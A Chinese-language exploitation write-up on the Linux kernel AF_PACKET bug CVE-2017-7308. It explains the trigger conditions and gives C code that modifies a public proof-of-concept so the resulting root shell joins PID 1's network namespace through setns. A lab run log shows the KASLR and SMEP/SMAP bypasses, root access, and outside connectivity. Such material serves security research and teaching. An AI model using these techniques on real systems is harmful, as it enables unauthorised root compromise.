针对数据包套接字攻击Linux内核的漏洞利用

CVE-2017-7308是一个与数据包套接字相关的Linux内核漏洞。我们此次关注的重点放在获取shell之后进行的一些操作和利用。

该漏洞本身(CVE-2017-7308)是一个符号类型漏洞，会导致堆越界写入问题。在启用TPACKET_V3版本的环形缓冲区条件下，我们可以通过为AF_PACKET套接字的PACKET_RX_RING选项提供特定的参数来触发这个漏洞。漏洞触发成功后，在“net/packet/af_packet.c”源码中，“packet_set_ring()”函数中的完整性检查过程就会被绕过，最终导致越界访问。

该漏洞影响所有启用AF_PACKET套接字(CONFIG_PACKET = y)的内核。但具体的实现则需要CAP_NEW_RAW这一功能，从而创建出AF_PACKET套接字。通常来说，只有特权用户才具有上述权限。但是，如果启用了用户命名空间(User namespace, CONFIG_USER_NS = y)，并且未授权用户拥有可访问权限，那么同样可以利用该漏洞。

Andrey提供了一个PoC以证明这一漏洞，运行后将得到下面的shell：

到现在，我们已经成功得到了shell。但我们发现，目前仍然与真正的网络相隔开，因此我们想尝试进行一些网络相关的突破。

突破网络

从生成的shell中，我们首先列出网络接口：

如图所示，我们目前只有环回接口(Loopback interface)可用，无法ping通Google。那么，为什么会发生这种情况，又如何解决呢?还是要从Andrey的代码和Linux数据包套接字的官方文档中寻找答案。

在他的代码中，他通过调用带有CLONE_NEWUSER标志的unshare函数来创建一个新的用户命名空间。这样，调用的进程就会被移动到一个新的用户命名空间中，而这个名称不与任何已经存在的进程共享。如前所述，这是漏洞利用的必要条件。只有特权用户才拥有CAP_NET_RAW功能的权限，但新用户命名空间中的未授权用户可以创建数据包套接字, 这也正是他使用unshare函数(CLONE_NEWUSER)的原因。

随后，会再一次调用unshare函数，但此时是调用带有CLONE_NEWNET标志的unshare函数。根据文档，这一标志的含义是：将调用进程移动到一个新的网络命名空间中，且该名称不与任何已经存在的进程共享。

现在状况开始明朗了。然而，尽管我们清楚了CLONE_NEWUSER的用途，但为什么要将网络隔离呢?原因在于，我们为了保证全部覆盖，通过环回接口发送的任意数据包都不能被干扰，所以才需要一个独立的网络环境。

但如果在一个有大量接口和大量数据包的环境中，这样做无疑会降低漏洞的利用程度。

后开发利用

意识到真正的问题所在，我们就必须找到一种方法来克服这种状况，一个较好的解决方案是setns。setns是命名空间API中的一个重要函数，setns系统调用允许调用进程加入已有的命名空间，具体的命名空间通过引用/proc/[pid]/ns files中的文件描述符来制定。但是，仅有有限的几个命名空间可以让我们加入。/proc/[pid]/ns/net文件是进程网络命名空间的句柄，我们需要对这一文件进行分析，从而知道哪一个网络命名空间是我们可以加入的。

我们决定尝试从PID 1加入网络命名空间，这是Linux中init进程的PID，也是内核启动的第一个进程，因此它拥有最大的特权，我们猜测这一进程可以访问系统中的任何网络接口。但是，我们必须先拥有一些权限后才能加入这个网络命名空间，这对我们来说并不是个大问题，因为我们已经利用漏洞可以轻松获取到root权限，之后再执行这一项操作。

首先，我们需要获得一个文件描述符，以加入PID 1的网络命名空间：

int fd;

fd = open("/proc/1/ns/net", O_RDONLY)

一旦我们有了一个文件描述符，便可以在调用setns函数时使用, 而第二个参数是我们要加入的命名空间：

setns(fd, CLONE_NEWNET);

为测试是否有效，我们对PoC中的exec_shell进行了修改，修改后的exec_shell将用于在提权后被触发：

void exec_shell() {
        char *shell = "/bin/bash";
        char *args[] = {shell, "-i", NULL};
 
        int fd;
 
        fd = open("/proc/1/ns/net", O_RDONLY);
        if (fd == -1)
        {
                perror("error opening /proc/1/ns/net");
                exit(EXIT_FAILURE);
        }
 
        if (setns(fd, CLONE_NEWNET) == -1)
        {
                perror("error calling setns");
                exit(EXIT_FAILURE);
        }
       
        execve(shell, args, NULL);
}

下面是执行后的结果：

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit

fastix@fastix-virtual-machine:~$ ./exploit

[.] starting

[.] namespace sandbox set up

[.] KASLR bypass enabled, getting kernel addr

[.] done, kernel text: ffffffffb5800000

[.] commit_creds: ffffffffb58a5cf0

[.] prepare_kernel_cred: ffffffffb58a60e0

[.] native_write_cr4: ffffffffb5864210

[.] padding heap

[.] done, heap is padded

[.] SMEP & SMAP bypass enabled, turning them off

[.] done, SMEP & SMAP should be off now

[.] executing get root payload 0x55fa39fa7612

[.] done, should be root now

[.] checking if we got root

[+] got r00t ^_^

root@fastix-virtual-machine:/home/fastix# id

uid=0(root) gid=0(root) groups=0(root)

root@fastix-virtual-machine:/home/fastix# ip link list

1: lo: mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

2: ens33: mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000

link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff,multicast,up,lower_up>

root@fastix-virtual-machine:/home/fastix# ifconfig

ens33: flags=4163 mtu 1500

inet 192.168.1.112 netmask 255.255.255.0 broadcast 192.168.1.255

inet6 fe80::5cd:ee6f:92b:ccc6 prefixlen 64 scopeid 0x20

ether 00:0c:29:98:3b:85 txqueuelen 1000 (Ethernet)

RX packets 69 bytes 9044 (9.0 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 85 bytes 9782 (9.7 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0,broadcast,running,multicast>

lo: flags=73 mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

inet6 ::1 prefixlen 128 scopeid 0x10

loop txqueuelen 1 (Local Loopback)

RX packets 3329 bytes 206245 (206.2 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 3329 bytes 206245 (206.2 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@fastix-virtual-machine:/home/fastix# ping www.google.com

PING www.google.com (216.58.202.132) 56(84) bytes of data.

64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=1 ttl=50 time=52.7 ms

64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=2 ttl=50 time=54.6 ms

64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=3 ttl=50 time=51.9 ms

64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=4 ttl=50 time=53.7 ms

^C

--- www.google.com ping statistics ---

5 packets transmitted, 4 received, 20% packet loss, time 4008ms

rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms

,loopback,running>,up,lower_up>

如上所示，现在除了环回接口之外，我们还有了ens33接口，并成功地连接到外网。